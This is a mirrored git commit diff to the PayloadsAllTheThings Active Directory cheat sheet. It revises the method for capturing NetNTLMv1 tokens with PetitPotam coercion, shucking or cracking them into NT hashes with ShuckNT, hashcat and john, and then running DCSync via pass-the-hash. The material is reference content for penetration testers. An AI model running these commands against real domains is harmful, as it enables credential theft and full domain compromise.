mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update NetNTLMv1 breaking methodology
Add SHuck.Sh/ShuckNT process and details.
This commit is contained in:
parent
b715364547
commit
4336cb1fd5
1 changed files with 25 additions and 7 deletions
|
@ -2094,9 +2094,9 @@ root@kali:~$ klist
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Capturing and cracking Net-NTLMv1/NTLMv1 hashes
|
## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens
|
||||||
|
|
||||||
> Net-NTLM (NTLMv1) hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash.
|
> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
|
||||||
|
|
||||||
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
|
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
|
||||||
|
|
||||||
|
@ -2120,19 +2120,37 @@ root@kali:~$ klist
|
||||||
PetitPotam.exe Responder-IP DC-IP # Patched around August 2021
|
PetitPotam.exe Responder-IP DC-IP # Patched around August 2021
|
||||||
PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users
|
PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users
|
||||||
```
|
```
|
||||||
* If you got some `NTLMv1 hashes`, you need to format them to submit them on [crack.sh](https://crack.sh/netntlm/)
|
* If you got some `NetNTLMv1 tokens`, you can try to **shuck** them online via [Shuck.Sh](https://shuck.sh/) or locally/on-premise via [ShuckNT](https://github.com/yanncam/ShuckNT/) to get NT-hashes corresponding from [HIBP database](https://haveibeenpwned.com/Passwords). If the NT-hash has previously leaked, the NetNTLMv1 is converted to NT-hash ([pass-the-hash](#pass-the-hash) ready) instantly. The [shucking process](https://www.youtube.com/watch?v=OQD3qDYMyYQ&ab_channel=PasswordVillage) work for any NetNTLMv1 with or without ESS/SSP (challenge != `1122334455667788`) but mainly for user account (plaintext previsouly leaked).
|
||||||
|
```ps1
|
||||||
|
# Submit NetNTLMv1 online to https://shuck.sh/get-shucking.php
|
||||||
|
# Or shuck them on-premise via ShuckNT script:
|
||||||
|
$ php shucknt.php -f tokens-samples.txt -w pwned-passwords-ntlm-reversed-ordered-by-hash-v8.bin
|
||||||
|
[...]
|
||||||
|
10 hashes-challenges analyzed in 3 seconds, with 8 NT-Hash instantly broken for pass-the-hash and 1 that can be broken via crack.sh for free.
|
||||||
|
[INPUT] ycam::ad:DEADC0DEDEADC0DE00000000000000000000000000000000:70C249F75FB6D2C0AC2C2D3808386CCAB1514A2095C582ED:1122334455667788
|
||||||
|
[NTHASH-SHUCKED] 93B3C62269D55DB9CA660BBB91E2BD0B
|
||||||
|
```
|
||||||
|
* If you got some `NetNTLMv1 tokens`, you can also try to crack them (more time and chargeable). For this you need to format them to submit them on [crack.sh](https://crack.sh/netntlm/). [Shuck.Sh](https://shuck.sh/) Converter can be used online to convert format easily.
|
||||||
```ps1
|
```ps1
|
||||||
username::hostname:response:response:challenge -> NTHASH:response
|
username::hostname:response:response:challenge -> NTHASH:response
|
||||||
NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972
|
NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972
|
||||||
```
|
```
|
||||||
* Or crack them with Hashcat / John The Ripper
|
* Finaly, if [Shuck.Sh](https://shuck.sh/) nor [Crack.Sh](https://crack.sh/) can be used, you can try to crack them with Hashcat / John The Ripper
|
||||||
```ps1
|
```ps1
|
||||||
john --format=netntlm hash.txt
|
john --format=netntlm hash.txt
|
||||||
hashcat -m 5500 -a 3 hash.txt
|
hashcat -m 5500 -a 3 hash.txt # for NetNTLMv1(-ESS/SSP) to plaintext
|
||||||
|
hashcat -m 27000 -a 0 hash.txt nthash-wordlist.txt # for NetNTLMv1(-ESS/SSP) to NT-hash
|
||||||
|
hashcat -m 14000 -a 3 inputs.txt --hex-charset -1 /usr/share/hashcat/charsets/DES_full.hcchr ?1?1?1?1?1?1?1?1 # for NetNTLMv1(-ESS/SSP) to DES-keys (KPA-attack), then regenerate NT-hash with these DES-keys on https://shuck.sh/converter.php.
|
||||||
```
|
```
|
||||||
* Now you can DCSync using the Pass-The-Hash with the DC machine account
|
* Now you can DCSync using the Pass-The-Hash with the DC machine account
|
||||||
|
|
||||||
:warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used.
|
:warning: NetNTLMv1 with ESS / SSP (Extended Session Security / Security Support Provider) changes the final challenge by adding a new alea (!= `1122334455667788`, so chargeable on [crack.sh](https://crack.sh/)).
|
||||||
|
|
||||||
|
:warning: NetNTLMv1 format is `login::domain:lmresp:ntresp:clientChall`. If the `lmresp` contains a **0's-padding** this means that the token is protected by **ESS/SSP**.
|
||||||
|
|
||||||
|
:warning: NetNTLMv1 final challenge is the Responder's challenge itself (`1122334455667788`) when there is no ESS/SSP. If ESS/SSP is enabled, the final challenge is the first 8 bytes of the MD5 hash from the concatenation of the client challenge and server challenge. The details of the algorithmic generation of a NetNTLMv1 are illustrated on the [Shuck.Sh Generator](https://shuck.sh/generator.php).
|
||||||
|
|
||||||
|
:warning: If you get some tokens from other tools ([hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) or [chapcrack](https://github.com/moxie0/chapcrack)) in other formats, like tokens starting with the prefix `$MSCHAPv2$`, `$NETNTLM$` or `$99$`, they correspond to a classic NetNTLMv1 and can be converted from one format to another [here](https://shuck.sh/converter.php).
|
||||||
|
|
||||||
|
|
||||||
**Mitigations**:
|
**Mitigations**:
|
||||||
|
@ -4447,4 +4465,4 @@ De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_
|
||||||
* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
|
* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
|
||||||
* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
|
* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
|
||||||
* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html)
|
* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html)
|
||||||
* [Certificates and Pwnage and Patches, Oh My! - Will Schroeder - Nov 9, 2022](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d)
|
* [Certificates and Pwnage and Patches, Oh My! - Will Schroeder - Nov 9, 2022](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d)
|
||||||
|
|
Loading…
Reference in a new issue